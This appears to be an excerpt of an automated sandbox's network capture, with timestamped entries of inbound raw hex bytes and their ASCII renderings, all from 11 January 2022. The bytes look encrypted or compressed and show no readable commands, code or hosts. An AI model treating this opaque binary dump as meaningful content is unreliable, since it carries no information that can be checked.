                                                                                                                                  2022-01-11 22:39:10 UTC3254INData Raw: d3 90 fc f3 26 fb 0b e9 bd f3 4e e1 b4 aa b2 9f b4 f1 a4 39 05 b3 fc 80 ce 7e cf 6a 01 2f 59 70 a4 23 8c 41 ab 8f a8 c3 d0 cc e3 a3 86 27 aa ad 9f d1 5e 64 42 99 b4 0b a8 28 a8 88 6c b7 78 c7 a9 28 09 38 0d 5d bf 01 5a f2 cc ed 63 bc d2 46 b9 9d 34 f9 2d f1 f1 2f 3b de b8 e8 33 8d ff f0 8f 45 c7 9b 7e ee 19 2a ac 5f a0 8e f5 95 60 1e 88 64 9d 92 75 15 d1 40 d5 2b 1b 34 92 24 ef 2e 1d 63 87 ef 72 95 15 fe 76 a6 01 f1 7d 4c 93 94 3b 72 bd 1f 79 00 f2 06 49 cd e8 49 d3 d8 82 d6 7d 25 ef 80 c2 30 fe c3 fd 05 90 ed 89 99 b9 73 aa cb 24 31 bc 5f 12 00 6a 4b 2d 32 c2 27 44 22 2d 09 04 5a a8 53 69 f9 12 ec 2a 1c e9 b8 06 e1 ca c6 9a a4 61 a5 c9 1e 5f 6e 38 73 57 7a 64 b0 57 44 c9 8c df 81 1e 01 f8 17 f9 e2 01 91 00 d1 71 c7 08 bf 7a 75 fe 6b 2c bd 86 d8 33 6d 23
                                                                                                                                  Data Ascii: &N9~j/Yp#A'^dB(lx(8]ZcF4-/;3E~*_`du@+4$.crv}L;ryII}%0s$1_jK-2'D"-ZSi*a_n8sWzdWDqzuk,3m#
                                                                                                                                  2022-01-11 22:39:10 UTC3270INData Raw: be eb 9f 44 43 c3 e0 93 16 1e 3c 01 d3 32 f3 e4 07 e6 c0 00 c5 62 98 13 48 52 9b eb 47 5f 30 9f 18 d7 c6 40 34 d4 68 cd 1e 81 61 24 9b cf 6b b2 b7 81 93 e5 f8 36 4d 28 66 eb e1 08 de 4c f2 c1 0d 61 f7 0d 95 88 08 a9 1d ce d2 66 f7 50 69 33 c6 68 80 3d 5c 3f 01 db c7 45 fa 55 2a 13 f3 1d ec 76 cb e4 c3 af be a3 d6 df 42 ba 56 ef b5 c6 27 89 21 ee a9 f3 b5 c8 04 d8 11 2a 7e d0 df 06 bf 39 a6 94 57 aa 79 27 3d e2 1d d2 24 32 6c 0b e3 8e 64 ac 0b 22 74 ad 2b 49 ca ac 27 1f a7 f4 40 54 56 74 5b 67 81 4b aa 3f a3 2f 6c 4b 0b e3 ab 6d 11 bf c3 6b 84 2d 1e 4b 78 49 0a c3 49 bb 86 5f 30 8f ad a8 ba d4 af c2 c2 8f c4 4e 64 c5 27 41 53 97 4c fd 86 59 d5 8d f1 6e 5e 29 fc 1a 39 14 31 fd 9a f9 19 66 57 29 78 11 da eb c1 bc b1 54 fd 0d 79 c4 21 72 0c 27 0c 62 b0 de d8
                                                                                                                                  Data Ascii: DC<2bHRG_0@4ha$k6M(fLafPi3h=\?EU*vBV'!*~9Wy'=$2ld"t+I'@TVt[gK?/lKmk-KxII_0Nd'ASLYn^)91fW)xTy!r'b
                                                                                                                                  2022-01-11 22:39:10 UTC3286INData Raw: 29 ba 10 a7 ed a2 1c 96 ee d0 ae 19 d7 cf c2 b2 3e 0c 26 ad 1b f0 db ab c9 0f 22 4d 84 bf e1 10 48 2b 54 1a f5 b5 6b 6e 23 8b f3 a7 c6 82 f8 f7 fb f8 09 b3 56 81 23 96 05 c1 c9 b7 7b a9 d3 70 dd 98 31 75 bc c8 eb 7a 8d b8 a1 8e 8a b6 24 9a 9c 96 df ad 25 be 34 13 bc d8 6f bc 9d 92 30 52 b1 3c 6d a8 62 9a b7 52 80 33 3a d3 42 97 2b 41 15 f9 9f 5c 4d 57 0c 99 89 1f 9e 4a 3d 5a 9a 9e 60 fa 51 ba a7 48 e8 3e 08 5f 0e e9 b1 fa df 42 9d fa 68 44 08 a5 3a a5 5c ca 7e 81 71 3e 2a c5 7b 41 bf 9d c4 e0 2b fb 47 a8 b6 04 5b 54 76 d8 f7 5b 7d 29 7e c7 74 20 88 5a f6 46 6c a8 56 0b 50 ee 62 56 4b 95 30 8c 3c 1c 39 ff 2a 85 80 ce fb 7a 1d 62 69 9f 60 65 78 c8 b1 18 4a 82 bb 54 d3 53 92 be 14 cc 40 77 66 a8 14 57 2b 98 6c 08 40 12 81 e7 23 51 71 4d 6b 65 57 fd 77 a5 dd
                                                                                                                                  Data Ascii: )>&"MH+Tkn#V#{p1uz$%4o0R<mbR3:B+A\MWJ=Z`QH>_BhD:\~q>*{A+G[Tv[})~t ZFlVPbVK0<9*zbi`exJTS@wfW+l@#QqMkeWw
                                                                                                                                  2022-01-11 22:39:10 UTC3302INData Raw: 63 20 db 6b 6b b8 eb 29 34 d9 5b 8b 8f 9e 30 23 a6 34 03 f9 88 a4 e6 02 9b 11 25 0d af 56 9e 52 59 24 15 1e 07 24 89 1b e7 4b 68 96 93 e7 3e 93 40 bb 84 06 37 70 11 e3 09 88 2a d9 b0 c1 3b de a6 f8 be be ea 43 52 86 88 86 79 7d da d7 4a fd 48 22 10 30 8f fa 3f 04 29 62 a8 d8 71 2e 84 72 48 93 b2 39 62 f1 43 84 a7 c8 54 b3 b3 49 ff 63 1f 55 d7 41 9f 4b b7 49 7c c3 03 32 1b 2b 99 d2 bb 1b 9b ca 6b a5 57 37 48 13 bb 78 11 c8 23 e6 59 89 6e c4 4b d5 8c 6e 94 55 1e 8c 1e de 67 78 51 c8 b6 58 20 cf ef f4 6e 21 ad 4b ce c0 e0 8e 56 85 e3 e6 dc a8 6d b0 21 32 c8 86 36 61 3f 55 ac 1d 23 5f fd cb 0b f3 ab b4 4f 17 c3 5e e5 d8 64 ac fe d6 32 8b 9a b9 b2 43 6f 92 9d 65 67 e4 a4 42 f1 b5 ff 0b f9 65 42 ae f2 6e 37 46 f7 50 c4 19 1a ae 8d bb 38 1c 1a 6e a3 7a 88 e3 7f
                                                                                                                                  Data Ascii: c kk)4[0#4%VRY$$Kh>@7p*;CRy}JH"0?)bq.rH9bCTIcUAKI|2+kW7Hx#YnKnUgxQX n!KVm!26a?U#_O^d2CoegBeBn7FP8nz
                                                                                                                                  2022-01-11 22:39:10 UTC3318INData Raw: 1e 6b 28 c8 e6 80 82 2f 25 f6 7a 1f 9c 2e de af 06 1b cf ea dd 1c 94 f7 9e 27 43 94 6b 64 62 2b fa 60 1e 35 99 55 36 98 a0 46 47 ad 23 44 ff 94 ae 93 fa b7 6e cc aa 38 4f d3 6f 02 26 84 15 85 64 51 36 2e fd 0b 09 04 bb b7 ee b2 7f 0f 7e 3a 40 b4 67 4d 85 87 61 35 4e 5c 79 9a ed 34 be 35 fc 42 05 3d 9f 14 e5 10 39 f6 f7 ae 76 8f 4b 3f e3 6e c0 2f c3 8e ce fd 97 06 d3 78 37 09 1b 28 ef 32 4f 37 f4 c6 a5 51 33 1a 64 57 d4 3a 68 91 87 42 c8 52 a8 48 76 b7 ef 00 08 e5 8f 74 13 cb 40 31 9b 22 ee 28 66 58 b4 6c 85 bb e6 cf 3d 30 d3 da 14 05 15 e9 9c 9e e9 a2 12 06 3f 1a 41 99 d1 af 7c 4c 19 c9 1d 6a e8 c0 22 87 02 a4 46 d9 5e ae 25 1c cf 3d 3b 0c 77 8c 3a 54 a0 ba 45 8a 71 4e 42 0e 51 8c fb 76 e6 3c 81 32 cc c7 34 13 53 ee fd 40 70 2b 5c ac 66 de 1c a7 a7 69 d5
                                                                                                                                  Data Ascii: k(/%z.'Ckdb+`5U6FG#Dn8Oo&dQ6.~:@gMa5N\y45B=9vK?n/x7(2O7Q3dW:hBRHvt@1"(fXl=0?A|Lj"F^%=;w:TEqNBQv<24S@p+\fi
                                                                                                                                  2022-01-11 22:39:10 UTC3334INData Raw: 4b 54 9a 4c e6 35 8c 1a 6c 6a db 12 a7 14 86 d3 ba 83 04 0e 15 f2 42 94 0f 8e fd e1 06 01 7e 35 ff 2c 75 90 b9 8f 31 b3 2a b1 71 d2 50 25 25 2c 73 16 06 fd 45 15 52 2b cd 0c 0b 80 f4 15 96 96 04 69 62 66 cd a9 cf 16 09 97 56 13 02 52 15 8e 24 46 89 6f 48 a6 ab 2c af f2 5d d9 bb 04 82 ef 3f bf 6a 8c 20 ef 4f c9 52 1e 87 fc b8 b9 60 30 ef b4 46 3b 8c 9c 37 37 89 af 65 a1 ed 0e 95 dd ef e4 31 72 3d bb e9 b3 1b 06 5c 02 47 59 a1 61 2d 78 a7 6b 1b 09 c6 51 26 91 91 3f 64 f7 4c 05 68 b3 6d 13 b3 f8 4d bc af 1d d1 d8 70 3d 25 b4 95 72 41 ee 42 50 8a 9b 0e 84 d1 74 6b f9 7a c8 eb 8f f6 03 6d 9c b2 09 fe 6a 20 39 d7 53 b2 c8 07 69 a0 9b ad 66 94 b3 72 4f 2a 59 68 a1 22 97 ab 26 bd a3 e5 28 a3 db 62 cc 6c a0 21 f5 1a 15 61 da 68 6a f8 a4 c1 8c fb 60 54 6a 4a af 40
                                                                                                                                  Data Ascii: KTL5ljB~5,u1*qP%%,sER+ibfVR$FoH,]?j OR`0F;77e1r=\GYa-xkQ&?dLhmMp=%rABPtkzmj 9SifrO*Yh"&(bl!ahj`TjJ@
                                                                                                                                  2022-01-11 22:39:10 UTC3350INData Raw: e9 97 9b a3 84 b9 09 09 9b cc 1b 63 17 43 b0 ac 5b 00 99 73 04 6f 08 f0 ee af 62 6b 51 74 54 1f 19 a5 49 0b 85 db 71 fc 65 ee 37 1d 01 1c c9 f1 fd b1 03 3c af cf 74 38 3d c6 14 0d 4a b5 51 09 a3 e9 49 16 e5 17 ce 14 29 9f c5 3e 82 4d e3 13 df c9 c4 89 39 26 43 3f 9e 8f c0 30 be 7a 60 20 ef 50 d6 46 bf 2f 45 ae cf 67 f4 c7 01 20 b5 2b ef 84 e6 10 03 62 69 fd 21 e2 3d 30 3d 54 35 e4 89 1c c3 0b 79 a3 e0 2b 2d 65 47 02 0a b3 2f 13 10 9c f6 5a f2 59 2e 51 a6 3b 4a 46 cb b5 7e f6 23 db b3 2d a3 d6 01 2f 5a cd c6 53 5a a7 84 5e 7b f3 f0 d7 48 90 30 42 6b 75 0d 9d df 48 bc 53 ae 3d b9 88 c5 9d f6 65 a6 1d 69 69 c0 bd 55 a1 d3 fc 4d a0 b7 29 2e 84 2b 4a dd 15 a7 df e4 85 5e 8e b8 37 bd ec cc 9a 8a 80 34 9b 48 03 7e 65 a2 fb 10 7a a3 67 9a dc 24 23 db db 4b f5 0a
                                                                                                                                  Data Ascii: cC[sobkQtTIqe7<t8=JQI)>M9&C?0z` PF/Eg +bi!=0=T5y+-eG/ZY.Q;JF~#-/ZSZ^{H0BkuHS=eiiUM).+J^74H~ezg$#K
                                                                                                                                  2022-01-11 22:39:10 UTC3366INData Raw: 58 52 58 5b fd 02 66 da 2a 44 93 94 75 6d 71 2d 7e 7e ee 79 9b 68 02 bd 28 09 55 ed d6 41 38 24 af d5 71 37 3c 23 32 ed 93 79 78 35 d5 d4 a7 80 b0 82 d2 81 f0 a8 b1 b1 c8 44 11 6a 4b d7 2a 73 0a a5 d4 41 b9 f5 9e d8 e1 06 85 03 0d 6a 21 84 31 fa 48 54 92 5e 1a db 1b a3 ab 49 52 31 33 73 ef ed 8f de 05 14 e6 68 3a 3c 6e 91 51 bc 23 58 ad 1d 66 01 8c d8 ce bb fa 56 7d 78 74 e7 fa 25 1a a7 23 85 68 4c b4 5b d9 39 3d 38 2a 4d 1f 69 47 f8 4c 76 e6 7a 4e 6a d8 9f 69 19 7c b5 32 43 4d 3c 2f 5e 74 41 c3 5e 29 7a 76 b0 ce 95 86 c1 35 9a 56 a5 f9 42 e7 4c fa 0f 10 c6 a7 42 a3 79 bc 50 5e 7a b7 36 c8 52 c2 d9 52 1a e6 f7 cc 85 c1 eb fa dc 91 f2 b8 4a 3f 26 8a b3 8a 5c 33 02 ec 47 33 3e a0 b3 0e bd 54 b0 3e 44 8b 35 e0 e0 54 14 d3 8d df fa 10 fc 56 13 14 7e ce a1 94
                                                                                                                                  Data Ascii: XRX[f*Dumq-~~yh(UA8$q7<#2yx5DjK*sAj!1HT^IR13sh:<nQ#XfV}xt%#hL[9=8*MiGLvzNji|2CM</^tA^)zv5VBLByP^z6RRJ?&\3G3>T>D5TV~
                                                                                                                                  2022-01-11 22:39:10 UTC3382INData Raw: bc ac e9 c0 05 0c 45 7f 9d ce 59 fd dd 0c d6 bd 76 64 7a 6c fe 4d 71 a0 b2 34 ce 23 a7 ba d7 93 5e 4a 21 6b ba b1 f9 9c 84 23 ac 03 91 f7 fe 3c df 25 75 e8 0f 23 03 c4 e9 e2 04 a2 59 43 b1 57 2d c9 dd be 21 44 64 94 8b 31 36 db 0b 6f c3 ec f5 16 f3 34 a3 5c 1c 9c 6d 0c dd 02 b3 b6 f5 32 18 dd 39 7c 93 6c a6 1e 5e 1f 28 52 df 69 d3 31 4c 0c 91 ee ea 4d 7d d3 6d ca fd 84 bc 5e 79 af 1f 4b 25 0f 91 15 a5 64 9f d9 3c 94 34 53 ae 31 85 9b 5e 30 df 7d b3 17 78 5c cf 9c 10 de 26 98 6b 3c 61 46 a7 f5 cf ed 17 8e 8f a5 73 2c f8 bc 42 02 d2 e5 68 9b 2e c4 b7 db 97 8a ef a2 ad 87 78 54 08 7f 1d 32 5e 8d af a4 16 99 a2 40 04 a1 04 f1 62 00 68 c1 4a 7c f7 97 55 5d 07 7b a6 bc 13 ce d4 8d 2c 5c a9 7b dc 1e e7 85 c3 6c 48 c4 97 56 ff a9 9d ca 2e 8b e4 b0 e0 8a c4 a0 25
                                                                                                                                  Data Ascii: EYvdzlMq4#^J!k#<%u#YCW-!Dd16o4\m29|l^(Ri1LM}m^yK%d<4S1^0}x\&k<aFs,Bh.xT2^@bhJ|U]{,\{lHV.%
                                                                                                                                  2022-01-11 22:39:10 UTC3398INData Raw: c1 70 6d a1 af a4 4d 19 fb 25 19 23 64 8f 28 e6 17 c4 bb 68 f8 49 f7 ce d7 09 18 e8 01 97 89 3e 45 0b a2 e4 cd 12 0c 77 b7 c6 a6 f8 08 ff 12 6c ee 1b bd df a9 76 ef 4b cf 2f 6f 02 20 b8 d2 96 d8 ef 09 65 74 83 a4 e2 49 ef 8c 9e 54 e9 97 d5 b4 9d bf 67 d7 bf 2b 2a e7 65 02 84 34 1f 9f d0 b9 6d 1b 1f b3 cc f6 ae b1 e7 1a 73 f2 e4 80 a2 28 db 95 3d bc c1 65 e9 db 5b 58 15 fa 65 27 e6 51 db ad 96 72 e3 dc 6e 84 60 02 25 69 f2 19 c8 a0 25 69 17 0d ae 94 44 39 44 ee 7b 9b 10 0e e5 70 83 ed d8 33 6d a6 f4 6f f2 3e ee 8f 0b 96 e4 a3 96 98 a6 5a d3 4d ed 81 69 86 c5 38 59 47 da 84 64 24 c3 7c b3 99 5b 87 03 e8 20 d5 26 70 d0 29 a9 9c 1e 06 d6 6a 00 ee ac eb 99 77 75 0b ac 07 d9 ae a0 23 59 06 83 00 ab b4 f9 00 38 64 09 ed fe 14 2d ed 51 23 15 45 00 83 cb 8d 22 66
                                                                                                                                  Data Ascii: pmM%#d(hI>EwlvK/o etITg+*e4ms(=e[Xe'Qrn`%i%iD9D{p3mo>ZMi8YGd$|[ &p)jwu#Y8d-Q#E"f
                                                                                                                                  2022-01-11 22:39:10 UTC3414INData Raw: 9c 06 64 83 61 84 7d 8e 07 0d b4 8d 68 3e 93 65 c9 2b e6 7f db 1b 84 18 91 ff 77 f9 84 21 9a 4f 10 d5 aa 0a 4e bd b2 4c 29 e8 f5 5f 29 51 50 3b 23 9c 08 e5 81 e6 10 3c 7b 51 75 4a a5 df a5 3a 12 78 ee 4e e3 fa a8 ac 14 10 f1 02 84 bb 05 77 67 98 ad 2e 18 3e b4 b4 5b f0 d0 bb 18 63 33 c6 86 e7 43 94 66 fc cd 61 fc a3 32 9e e4 1c c0 f4 a3 e2 5c 03 cf b0 88 b6 46 16 a1 f7 e6 f7 a5 3f 22 ae 25 3c 05 e1 46 9f e1 08 eb 37 7a 7e 48 d2 1e a8 83 f7 fd b2 65 99 bd 96 f3 cc 75 af 56 d7 33 0c f5 18 5b fc 62 78 81 74 86 0b 95 d0 1d 41 37 20 ff 7b 3b dd 2d 9f 7c c7 39 fa 3b 2a e5 6a 5d ec 7f 6e e3 05 4b 03 d4 f5 1f c1 10 da f7 ba 13 f3 bc 63 ee 5a a3 6d 42 e1 3e 3b 73 cf 88 3a d3 26 09 0e 94 12 f1 35 7c d5 3f 11 40 39 28 f7 0a ae 70 e0 23 53 ac 38 2e 96 45 29 2d 60 fa
                                                                                                                                  Data Ascii: da}h>e+w!ONL)_)QP;#<{QuJ:xNwg.>[c3Cfa2\F?"%<F7z~HeuV3[bxtA7 {;-|9;*j]nKcZmB>;s:&5|?@9(p#S8.E)-`
                                                                                                                                  2022-01-11 22:39:10 UTC3430INData Raw: fd f7 e5 2d f5 2f e7 de c7 39 66 f5 75 33 db 68 bf 10 cb d6 83 5b b1 ac 97 96 56 f0 9c a8 0e aa 0c d4 c1 05 15 56 39 83 9d 1c f4 24 3d 2c f3 cb be 1a c5 72 79 98 65 26 c6 30 e4 c9 a7 3f 43 21 4e 4f 7d 39 2d 83 b0 eb 9f 85 14 da 95 25 bc ea e6 ad 4f b5 5c 9e b8 2e a6 b7 70 ed cd fc 76 c9 c6 15 90 28 62 cc d6 a1 f8 e2 a0 75 98 2a ff e4 47 87 be 4b 23 10 a2 3a 24 9c 8d 06 e4 24 5c 20 c7 47 58 f1 50 1c 0c d3 8e 4b 4f aa 41 98 19 c3 ed c2 57 00 9f 4e 0a 8d 53 89 c9 34 e6 c2 f7 92 28 33 4a 42 92 55 78 59 f7 7c 02 76 9d d9 c3 bb d9 80 b8 46 41 7a eb 4c be 86 bc b3 38 b2 6d 7a 76 c7 ff 8b 8e 66 0f 25 c4 72 96 68 c4 15 a7 e2 13 a9 f3 79 4c d5 a2 80 75 db 16 91 12 9b b6 62 07 c2 4f a6 24 3c 7e a4 0c 98 15 0d 64 db 0a 29 ca ad a6 73 73 15 9b f0 df df 98 d0 a0 f2 f4
                                                                                                                                  Data Ascii: -/9fu3h[VV9$=,rye&0?C!NO}9-%O\.pv(bu*GK#:$$\ GXPKOAWNS4(3JBUxY|vFAzL8mzvf%rhyLubO$<~d)ss
                                                                                                                                  2022-01-11 22:39:10 UTC3446INData Raw: 36 f9 30 86 b3 40 41 a8 44 c7 f3 8a 58 eb b8 d4 6b 5a 54 85 13 2d f5 08 a5 49 5b 83 d5 ee 3d 7c 3d 6a 52 82 68 63 e7 6b 56 90 65 35 ad c5 d8 5b e9 aa 93 8c 0b b2 70 9b ca f4 2c b1 5c 25 b0 d6 49 f1 0c a7 22 10 dd 06 93 e8 f1 57 0b 9a 5c 7b 77 09 0e 1d 5b e1 7c 74 eb aa cc c9 c0 16 d7 74 a7 de 1d ef e6 eb 50 cd 2d 19 93 95 14 fc 3f f4 bf 49 13 8b 95 a8 ba fd 19 fe 71 f4 db 87 f9 7e e4 4e 3b 00 53 d6 af ce f9 0c ae 5e 74 e9 87 ce 9d 28 25 87 15 db 9b 6f 0c 74 d1 b8 a0 7a 21 ee be 4a 5a 45 6b 57 84 08 b2 08 5a 4a fa c6 b6 75 9a 14 f2 4f 18 e7 df cf ba a1 c3 79 01 a2 ad b6 3d 9f 37 7c 9e 15 63 8c 87 72 cd eb 35 9e 93 66 24 80 d0 b7 1d de 9e eb 5e b0 73 bb 09 e6 fc 17 b8 43 20 51 62 80 e5 12 80 38 b7 22 9b 52 8b 49 1b f2 50 db 73 55 af c1 7f 83 25 6d a9 b6 cd
                                                                                                                                  Data Ascii: 60@ADXkZT-I[=|=jRhckVe5[p,\%I"W\{w[|ttP-?Iq~N;S^t(%otz!JZEkWZJuOy=7|cr5f$^sC Qb8"RIPsU%m
                                                                                                                                  2022-01-11 22:39:10 UTC3462INData Raw: 68 e7 3e 7b 8a b1 46 51 be 31 a2 b8 5c 2f 8c 88 e6 a7 1b 8d 7c 71 cf 4a 67 e1 66 93 d5 b9 9b f5 17 ae fa bd cd 99 96 be 69 49 9f 46 7c 45 10 eb c7 37 35 84 55 1f 1c 2b 26 22 28 c2 cb 29 cb 09 c5 0f e6 44 fc 6b b9 7a d7 97 1f ac 25 08 1c 88 e3 64 45 05 c9 e7 e6 22 51 a5 63 0a ca e1 6f 3c 5f d7 36 24 e2 36 5a 61 62 a9 a4 f4 f8 eb af ef cb cf ad 60 e4 7a 46 ad 23 33 52 64 66 da b8 80 29 a8 ae 9b b4 31 01 cd 2a c5 84 e8 85 d8 50 5f 3b 0c f3 66 fc 83 51 dc ee aa c1 31 66 e6 19 66 a7 16 99 ba 43 ef 89 52 02 54 1c 9c 63 ac d5 2c 13 7c e3 00 a1 f9 a6 86 2c 41 ad a2 2d 0c 34 04 02 42 91 9a 78 44 89 f2 1b 3e 46 68 f2 e1 49 16 fe e0 90 88 ea 1c f7 fd 90 84 22 6b d4 b6 2c 9c 15 28 82 f8 f1 2a d9 ee af ee 21 5e e1 2c 4d e6 67 2b b5 16 93 01 14 c2 58 6a 52 4a 93 0a 3c
                                                                                                                                  Data Ascii: h>{FQ1\/|qJgfiIF|E75U+&"()Dkz%dE"Qco<_6$6Zab`zF#3Rdf)1*P_;fQ1ffCRTc,|,A-4BxD>FhI"k,(*!^,Mg+XjRJ<
                                                                                                                                  2022-01-11 22:39:10 UTC3478INData Raw: 7c d9 b1 f7 3f 40 c6 67 70 d1 a0 fc 4a 52 e1 b4 75 ce 1d 37 c3 e8 f5 0f 1c 2b 6a a5 ee c7 39 fd 19 99 e4 e6 b3 fd 0d 1a b5 d3 95 84 8f cb 35 e1 c5 74 23 19 9d 2a 9c c4 73 be 6b 48 d5 12 36 c4 28 7b e9 b0 e7 f0 87 f6 bf 7d 75 62 fd 1f 21 72 6b 42 e1 54 71 4c 02 00 2c 94 a2 7f 6f e0 7f e4 f5 eb 67 97 15 f6 47 9b 34 fd 54 6d 1f e3 a3 86 54 eb d3 f8 62 63 79 e4 8b 09 21 54 e3 91 a0 49 60 35 71 da e6 6c ee 80 05 f8 ab cf 69 12 4a 32 ad 25 13 34 7c ce 2f 12 08 71 d4 7f 3a 0c 10 e3 cf 1f 60 a4 65 23 4f c7 f7 5b bc 9c 13 77 6f 58 d5 ee 8f 85 ed 77 b1 c4 f6 36 99 49 e0 cc 1a 2c da d2 30 83 81 fb c2 c1 e4 7d 60 0a b7 d9 4f 9b b2 ff ab b9 9e c0 b8 db 0a 1d 6b 99 22 c6 73 c0 cc a6 d3 61 ed b5 33 53 ca 85 ab b6 35 b7 b2 b1 5c 7f 30 00 f4 9c 9b c7 a7 4c 53 d3 a6 d7 69
                                                                                                                                  Data Ascii: |?@gpJRu7+j95t#*skH6({}ub!rkBTqL,ogG4TmTbcy!TI`5qliJ2%4|/q:`e#O[woXw6I,0}`Ok"sa3S5\0LSi
                                                                                                                                  2022-01-11 22:39:10 UTC3494INData Raw: b2 2c 6a a4 48 24 dc bc 6c 63 32 84 c8 8a b5 9e e3 1a c2 d6 2f 73 64 12 04 8b de 72 02 7a e7 03 1e 6e 47 fd d7 dd 3a 28 62 3a cd db db 12 fe 6a ca a3 fd b7 c6 ef 55 8d 99 e8 25 b7 ff 2d 4f 75 60 08 fc 43 4d f3 8a 52 3c d6 9b 4f 87 46 ec cf 10 9f 4a 45 a4 1a 53 c6 cf bb de f5 1e 73 85 e1 a2 4f be 89 8c e8 39 85 57 f7 54 c2 f6 92 ed b0 84 e7 fb e1 6e 72 b7 cd 9d 7e de 12 e0 3d aa 6e 15 54 7a 92 89 2d b4 85 54 cf f1 6f 8b 98 dc fc 69 bf 17 04 df 67 96 bb ef 0b f4 a0 54 06 2f 9b a1 f5 0f 2f 84 49 42 e0 73 b1 72 39 0d 7d 77 55 1c a3 bd 54 44 3b 5f fe ce e7 c7 b0 44 82 1b ab f8 a3 4b 52 85 53 94 93 38 3f 67 11 b9 c0 7f 8b 2c 6f 2d 27 3c c2 f2 98 0d 73 77 a4 07 f2 77 c6 43 5c 2d 93 5a dc fd 64 ee 89 a7 08 5c 28 33 67 4f 29 dd 4c 1a 65 a0 3f 34 89 1a 80 d1 28 23
                                                                                                                                  Data Ascii: ,jH$lc2/sdrznG:(b:jU%-Ou`CMR<OFJESsO9WTnr~=nTz-ToigT//IBsr9}wUTD;_DKRS8?g,o-'<swwC\-Zd\(3gO)Le?4(#
                                                                                                                                  2022-01-11 22:39:10 UTC3510INData Raw: ef 73 61 80 25 9b f9 29 90 5b fb 9a ee 1d 4f e0 eb 16 91 e3 3e 14 a7 e1 47 5f 62 49 48 f7 b0 97 91 21 4c 10 46 0f 31 26 7f 15 02 0e e2 bd 70 49 bf db ba fc 6a 77 e2 4a d0 08 0e 5e c6 a5 0a 8b 64 7e ab 10 0d 21 c7 04 ef ab 42 32 67 53 9c d0 5a 3a 0a 78 f6 bd 94 06 6e a7 94 1b 25 d2 0a 96 03 b4 61 99 bc 72 c9 72 8c ae 57 2f 97 5a 88 24 5f 61 e4 72 a0 2a 54 94 46 12 6f cf 0a 75 fc 44 c7 0a d8 df 2f b5 ec d5 07 09 b2 94 fc 9c 61 f2 d6 b0 84 96 78 42 bf 5f 28 4f 05 7b 97 af 93 50 c6 28 b2 91 af 8c 0b d3 e3 63 28 a8 a4 62 f3 bc bf d8 b7 17 54 e7 55 57 98 86 3e 2c 9d d9 58 59 c2 60 a4 90 0d aa 2c 2e 02 a0 29 ae 54 e3 72 7b 02 2b 76 6b 4c 60 fa 63 c3 ec 65 79 c9 a9 74 e3 35 9a 4a 3c c1 24 25 8c cd 1d 5e f3 c1 07 cc 26 68 4f 8a 7d 2e 3f 82 2d d5 76 72 1e 54 24 17
                                                                                                                                  Data Ascii: sa%)[O>G_bIH!LF1&pIjwJ^d~!B2gSZ:xn%arrW/Z$_ar*TFouD/axB_(O{P(c(bTUW>,XY`,.)Tr{+vkL`ceyt5J<$%^&hO}.?-vrT$
                                                                                                                                  2022-01-11 22:39:10 UTC3526INData Raw: b4 b1 9f 1e 86 c9 2f d3 88 93 43 1d ac f2 46 0e 8d 53 8f 1f 5a 16 6c 8b 21 f0 6e dc e1 11 22 c5 a8 ce a1 99 7f b7 68 64 6c ca 54 16 cb 88 e1 e1 35 b2 75 68 2f 51 7e 06 b9 74 dd a3 06 1a e8 d7 53 d2 66 73 c2 28 9c e0 c8 0f 2b 1b 12 69 11 55 17 d4 12 90 5c 5d 49 b0 fb 44 50 33 56 e0 21 39 c2 11 0e 88 47 4d a0 8e fe 52 a8 19 fd 2e 58 b5 70 d0 e2 50 d0 9d 01 84 5d 40 7f 9d e3 74 53 5f 67 eb e5 fa de 46 37 d9 1a 62 27 08 51 cc 38 42 86 19 0a e4 7f 74 47 81 a4 5e e8 a8 d7 a3 d4 cb 87 ed 05 76 72 1b 5d 73 c5 d4 1f 0e fc 30 00 17 c1 4a b4 dc 27 5d 33 fd c6 02 e7 ee 4d 2a 1a 28 d3 02 f0 bb e8 37 0a 9a ee 8a 38 e7 72 82 e6 91 18 fc a9 db a5 b7 5e d4 aa f2 e4 a5 72 00 34 52 80 53 a8 9d e8 ac 9a 74 34 b7 3f 9f ed 30 96 dd b8 12 97 52 5a 04 69 76 c0 d1 22 6c b6 31 10
                                                                                                                                  Data Ascii: /CFSZl!n"hdlT5uh/Q~tSfs(+iU\]IDP3V!9GMR.XpP]@tS_gF7b'Q8BtG^vr]s0J']3M*(78r^r4RSt4?0RZiv"l1
                                                                                                                                  2022-01-11 22:39:10 UTC3542INData Raw: 8f d9 60 7e 41 c4 5e 90 a2 98 41 5f 8e 3a dc ca 39 6b db 07 bf fc 91 f2 99 40 ce 18 e6 64 5b e2 f9 ec bf 2c 33 6f 43 be 81 68 19 fc f5 4e c1 28 7c d9 9d f5 67 03 87 ed c2 e9 67 ab eb de 46 2e 89 33 25 33 54 c0 19 22 ce 40 1c b7 d7 c0 16 47 3a 98 55 92 37 9c 22 31 83 af 63 42 ef 7d 3b 24 ec b5 0b e5 dc 87 eb 88 00 55 96 7b 64 07 71 c2 82 30 04 93 08 00 26 a1 17 8f 73 a2 df 0a f4 81 11 0a 8c 63 49 3c 4d 51 63 a3 c6 51 78 59 43 c9 12 df 0e 94 12 7e ec 2e 30 04 6e 15 9f 89 d4 40 17 eb 80 ec 8b 46 04 28 c2 db f3 00 88 df 81 e2 59 a9 63 21 db 01 f3 14 8b 71 f5 b1 54 d6 56 8f 93 87 f7 15 83 39 8f 19 81 d4 b4 19 bb 99 98 d0 c5 e0 14 60 e4 2a bc 4a 82 29 e3 0f a0 b1 65 e2 ce 75 e9 f2 c6 4d 82 e7 10 26 b7 47 fd 62 cf 5d 69 e1 ea 96 9f ff 20 d4 5c 52 20 87 97 e2 fa
                                                                                                                                  Data Ascii: `~A^A_:9k@d[,3oChN(|ggF.3%3T"@G:U7"1cB};$U{dq0&scI<MQcQxYC~.0n@F(Yc!qTV9`*J)euM&Gb]i \R
